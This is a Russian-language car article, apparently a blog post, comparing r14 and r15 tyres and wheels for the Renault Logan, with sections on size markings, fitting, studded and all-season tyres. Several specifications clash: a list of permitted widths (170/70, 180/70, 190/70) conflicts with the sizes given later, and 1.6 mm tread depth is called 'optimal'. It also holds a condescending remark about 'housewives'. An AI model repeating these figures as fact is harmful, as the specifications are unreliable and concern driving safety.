Однако более эстетичный вариант не всегда является подходящим для данной модели. От рисунка протектора r14 или r15 зависит уровень шелеста об асфальт, расход горючего. Именно поэтому, меняя штатные шины (14 или 15), либо диски на автомобиле, необходимо строго придерживаться определённых требований.

  1. Оригинальный диск содержит данные об имеющихся отверстиях под болты, диаметр центрального (основного) отверстия, а также другую необходимую информацию.
  2. Диск должен иметь посадочный диаметр, который не превышает 15 дюймов, но не менее 14.
  3. Для использования могут подойти шины с шириной протектора 180/70, 170/70, 190/70 r14 либо r15.
  4. Максимально подходящая для Рено Логан резина обозначена цифрой 80, означающей индекс нагрузки, а также обязательно буквой «Т», являющейся индексом скорости.
  5. Не рекомендовано использование непрофильных покрышек.

Стандартными дисками для данной модели является обычная штамповка на r14 или r15 (14 или 15, соответственно), выполненная из листовой стали. Именно её стремятся заменить на кованные или легкосплавные колёса. Однако зимой многие водители отдают предпочтение штампованным дискам.

Производители Логан устанавливают бескамерные покрышки, имеющие размер 165/80 r14. Также к установке допустимы 175/70 r14, соответственно, 185/70 r14.

Данная размерность отлично подойдёт к дискам с обозначением 5.5Jx14. На колеса 6Jx15 рекомендуется устанавливать покрышки, имеющие размеры 185/65r15. Чтобы разобраться в обозначениях, встречающихся в каталогах, следует ознакомиться с их расшифровкой:

  • 14-15 – обозначает диаметр;
  • J5.5-6 – показывает ширину в дюймах.

Исходя из этого, размер покрышек можно расшифровать так:

  • 165, 185 – их ширина;
  • 65, 70, 80 – указывают процент от ширины профиля;
  • 14-15 – соответствующий диаметр.

Согласно нормативам, оптимальной считается глубина протектора 1.6 мм. Наиболее безопасным вариантом – 2 мм. Какие же шины подходят лучше для данного авто, r14 или r15 (14 или 15 дюймов)?

Приобретая автомобиль, покупатель должен ознакомиться с размерами шин, которые лучше подойдут Рено Логан, сравнивая их с установленными производителем. Это позволит более реально представить общую сумму, включающую дополнительную установку навигационного устройства и климат-контроля.

Устанавливаем шины

Если есть возможность, доверьте установку шин специалистам. Например, официальному дилеру марки Renault. Так как для Renault Logan необходимы бескамерные шины, их самостоятельная установка может вызвать некоторые трудности. Кроме того, специалисты смогут провести балансировку колёс.

Шипованная резина

Многие считают, что шипованная «обувь» Рено Логан является панацеей от обледеневших дорог. Соответствует ли это действительности?

Шипованная резина обладает высокой эффективностью торможения на ледяной поверхности. Однако по голому асфальту она ездит слишком шумно, а тормозной путь её значительно увеличен. Поэтому шипованные покрышки – это, действительно, зимняя резина.

Это не говорит о необходимости тратить баснословные деньги. Зашиповав самостоятельно шины, можно получить тот же эффект, существенно сэкономив.

Компромиссом для всех времён года служат всесезонные покрышки. Правда, для энергичных водителей такая резина — огромный риск. Она лучше подходит неспешным домохозяйкам, которые даже на сухом покрытии едут не более 80 км/час. Поэтому, чтобы езда была комфортной и безопасной нужно грамотно подбирать шины.

Выводы

Как вы могли убедиться сами, зная все необходимые параметры для вашего автомобиля подходить к выбору шин, следует сугубо индивидуально, исходя из собственных потребностей, достатка и преследуемых целей. Важно помнить лишь одно, что не стоит экономить на тех элементах автомобиля, от которых напрямую зависит безопасность движения.

Подведем итог

Конечно, какие покрышки r14 или r15 лучше, решать вам. Однако основным правилом выбора резины для Рено Логан является соблюдение давления и размерности покрышек. Это поможет избежать непредвиденных проблем.

Закладка Постоянная ссылка.
1 ЗвездаНельзя так писать о ЛоганеЧто-то о новом Логане так себе написаноЛоган - супер машинаРено Логан лучше всех! (1 оценок, среднее: 5,00 из 5)
Загрузка...